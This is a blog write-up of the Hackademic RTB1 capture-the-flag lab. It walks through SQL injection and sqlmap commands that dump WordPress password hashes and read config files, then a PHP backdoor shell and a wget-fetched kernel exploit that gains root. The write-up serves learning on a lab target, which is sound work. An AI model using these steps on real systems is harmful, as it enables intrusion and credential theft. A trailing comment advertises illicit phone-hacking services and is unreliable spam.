A while back i started to research web app pentesting and managed to get through the DVWA hackademic challenges, an excellent way to learn Web App Pentesting by the way.
I did not post a blog entry for this. Will maybe do that later on.
I kind of felt that my skills within this area started to become rusty so I got active again and brought on another Challenge. The RTB1.
Root this box version 1, a VMware on linux running a webserver with backend database and applications.
I did not know what to expect so i began to explore..
First setting up the environment needed in VMware with host-only networking.
- RTB1
- My evil attack machine Running BT5R2
First i started off with SCANNING AND INFORMATION GATHERING.A really important step in the process of Penetration testing.
Since i know that the host is on my local subnet i do a simple ARP-scan to find the host.
root@bt:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.140.133 00:0c:29:e1:16:bf VMware, Inc.
Wonderful, we have the IP-address. Next...
PORTSCAN, WHAT IS IT RUNNING?
root@bt:~# nmap -v -n -P0 -sT 192.168.140.133
Starting Nmap 6.01 ( http://nmap.org ) at 2012-09-05 09:24 CEST
Initiating Connect Scan at 09:24
Scanning 192.168.140.133 [1000 ports]
Discovered open port 80/tcp on 192.168.140.133
Connect Scan Timing: About 42.90% done; ETC: 09:25 (0:00:41 remaining)
Completed Connect Scan at 09:25, 60.14s elapsed (1000 total ports)
Nmap scan report for 192.168.140.133
Host is up (0.92s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 60.24 seconds
OK. A webserver, how surprising :) Lets find out more..
BANNER GRABBING
root@bt:~# nc 192.168.140.133 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 05 Sep 2012 01:54:43 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Sun, 09 Jan 2011 17:22:11 GMT
ETag: "31cc-5c3-4996d177f5c3b"
Accept-Ranges: bytes
Content-Length: 1475
Connection: close
Content-Type: text/html; charset=UTF-8
OK. It seems to be running Fedora (2.2.15) with Apache as a Web Server.
Lets look at the webpages with a browser.
OK. Lets view the source of the page. http://192.168.140.133/Hackademic_RTB1/
Seems it is running WordPress 1.5.1.1
I could now run a vulnerability scan and look for exploits for automated attack, but i wanted to see if i can do something manually first.
Tempted to start attacking, we are still gathering information. It is important to get all information before running any kind of attack for best results.
More clicking. Clicked on the uncategorized link and noticed the URL changed to
http://192.168.140.133/Hackademic_RTB1/?cat=1
Lets add an ' to the end of the URL. and try cat=0 and so on..
Ooops. i found something. A MySQL backend :)
A table named wp_categories.
Lets find out how the table is setup and see how many columns the table has. We can do this by using the order by technique..
added: order by 1 to the end of the cat=0 statement
Seems to have at least one column.
added order by 2. Still ok
added order by 3. Still ok
added order by 4. Still ok
added order by 5. Still ok
added order by 6.
OK. From this we know that the table has 5 columns.
Using SQL union to find what column we can use for SQL command injection.
Seems that column 2 is something we can use.
Lets find out the version of the MySQL database using version()
It is running MySQL 5.1.47
More useful system commandsdatabase() Returns "wordpress"
user() Returns "root@localhost"
load_file() Lets see if we can browse local files.
Did not work with ascii /etc/hosts. Lets try with hex..
/etc/hosts converted to hex is 2f6574632f686f737473
It works! We get the hosts file.
We can also look for /etc/passwd to enumerate useraccounts and much more..
We can do alot manually, but it is easier to use some tools.
Lets try sqlmap
Lets get some tables
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=0 --tables
This command gives us all tables in all databases (wordpress, mysql and information_schema)
Very useful
Lets extract columns for the interesting table wp_users.
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 -D "wordpress" -T wp_users --columns
Database: wordpress
Table: wp_users
[22 columns]
+---------------------+---------------------+
| Column | Type |
+---------------------+---------------------+
| ID | bigint(20) unsigned |
| user_activation_key | varchar(60) |
| user_aim | varchar(50) |
| user_browser | varchar(200) |
| user_description | longtext |
| user_domain | varchar(200) |
| user_email | varchar(100) |
| user_firstname | varchar(50) |
| user_icq | int(10) unsigned |
| user_idmode | varchar(20) |
| user_ip | varchar(15) |
| user_lastname | varchar(50) |
| user_level | int(2) unsigned |
| user_login | varchar(60) |
| user_msn | varchar(100) |
| user_nicename | varchar(50) |
| user_nickname | varchar(50) |
| user_pass | varchar(64) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
| user_yim | varchar(50) |
+---------------------+---------------------+
Now lets list all users and password hashes for users in wp_users table.
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 -D "wordpress" -T "wp_users" -C "user_firstname,user_lastname,user_level,user_login,user_pass" --dump
Database: wordpress
Table: wp_users
[6 entries]
+----------------------------------+--------------+------------+---------------+----------------+
| user_pass | user_login | user_level | user_lastname | user_firstname |
+----------------------------------+--------------+------------+---------------+----------------+
| 21232f297a57a5a743894a0e4a801fc3 | NickJames | 1 | James | Nick |
| 50484c19f1afdaf3841a0d821ed393d2 | MaxBucky | 0 | Bucky | Max |
| 7cbb3252ba6b7e9c422fac5334d22054 | GeorgeMiller | 10 | Miller | George |
| 8601f6e1028a8e8a966f6c33fcd9aec4 | JasonKonnors | 0 | Konnors | Jason |
| a6e514f9486b83cb53d8d932f9a04292 | TonyBlack | 0 | Black | Tony |
| b986448f0bb9e5e124ca91d3d650f52c | JohnSmith | 0 | Smith | John |
+----------------------------------+--------------+------------+---------------+----------------+
We can go ahead and crack them also:
Interesting to note that user_level might be authorization level. So 10 could be the highest.
So now we have user accounts and their passwords, but we still do not have the root DBA password.
I know that the password is configured in some file somewhere on the system.
So Google is my friend.
Searched for "wordpress configuration file" and came up with the config filename wp-config.php
But i do not know the location, yet.
The httpd.conf could be helpful
After some trial and error and browsing the web for default location i tried.
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 --file-read="/etc/httpd/conf/httpd.conf"
The file contained.
DocumentRoot "/var/www/html"
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 --file-read="/var/www/html/Hackademic_RTB1/wp-config.php"
// ** MySQL settings ** //\r
define('DB_NAME', 'wordpress'); // The name of the database\r
define('DB_USER', 'root'); // Your MySQL username\r
define('DB_PASSWORD', 'lz5yedns'); // ...and password\r
So how do I login?
Googled some more and found that the admin login interface is /wp-admin
We cracked the passwords earlier so lets login with the useraccount with the highest user_level (GeorgeMiller)
after some looking around in wordpress admin gui.
Found that uploading was disabled. As an administrator i enabled uploading of php files.
Modified a php backdoor
Activate a shell listener. and clicked on the uploaded special.php.
We have a shell!! running as the apache user.
Now we could upload metasploit meterpreters for pivoting, but since the goal is to root the box we focus on that.
We can also start password guessing, using sucrack to crack the root password.
Lets see if the system is vulnerable first.
sh-4.0$ uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
My best guess is finding a matching local privilege escalation exploit in exploitdb.
Found a few good candidate exploits..
So i started to compile and test them out.
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation",2009-11-05,"Matthew Bergin",linux,local,0
12130,platforms/linux/local/12130.py,"Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0
14814,platforms/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit",2010-08-27,"Jon Oberheide",linux,local,0
15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
15774,platforms/linux/local/15774.c,"Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation",2010-12-18,"Jon Oberheide",linux,local,0
15285,platforms/linux/local/15285.c,"Linux RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0
Compile and upload the exploit
sh-4.0$ wget http://192.168.140.134/rtb1-rds
wget http://192.168.140.134/rtb1-rds
--2012-09-06 04:47:35-- http://192.168.140.134/rtb1-rds
Connecting to 192.168.140.134:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12503 (12K) [text/plain]
Saving to: `rtb1-rds'
0K .......... .. 100% 2.12M=0.006s
2012-09-06 04:47:35 (2.12 MB/s) - `rtb1-rds' saved [12503/12503]
sh-4.0$ ls -lsa
ls -lsa
total 60
4 drwxrwxrwt 6 root root 4096 Sep 6 04:47 .
4 dr-xr-xr-x 22 root root 4096 Sep 6 04:05 ..
4 drwxrwxrwt 2 root root 4096 Sep 6 04:05 .ICE-unix
4 -r--r--r-- 1 root root 11 Sep 6 04:05 .X0-lock
4 drwxrwxrwt 2 root root 4096 Sep 6 04:05 .X11-unix
4 drwx------ 2 gdm gdm 4096 Sep 6 04:05 orbit-gdm
4 drwx------ 2 gdm gdm 4096 Sep 6 04:05 pulse-PKdhtXMmr18n
16 -rwxrwxrwx 1 apache apache 12474 Sep 6 2012 rtb1
16 -rw-rw-rw- 1 apache apache 12503 Sep 6 2012 rtb1-rds
sh-4.0$ chmod +x rtb1-rds
EXPLOIT
sh-4.0$ ./rtb1-rds
./rtb1-rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
id
uid=0(root) gid=0(root)
YES! We got ROOT!
cd /root
ls
Desktop
anaconda-ks.cfg
key.txt
key.txt~
cat key.txt
Yeah!!
You must be proud because you 've got the password to complete the First *Realistic* Hackademic Challenge (Hackademic.RTB1) :)
Regards,
mr.pr0n || p0wnbox.Team || 2011
MISSION ACCOMPLISHED!!!
I specialize in hacking GSM cell phones and get them unlock then bring you results under 24 hours and also my services are cheap and affordable.
ReplyDeleteI hope to do business with you soon.
Contact Information
E-Mail: cyberfiles.hacker@gmail.com
my services are the best on this: Unlock iCloud iPhones, Android Fingerprint Unlock?, iPhones Fingerprint Unlock, Android Pattern Unlock...Etc and 100% security and discreet work is guaranteed.,...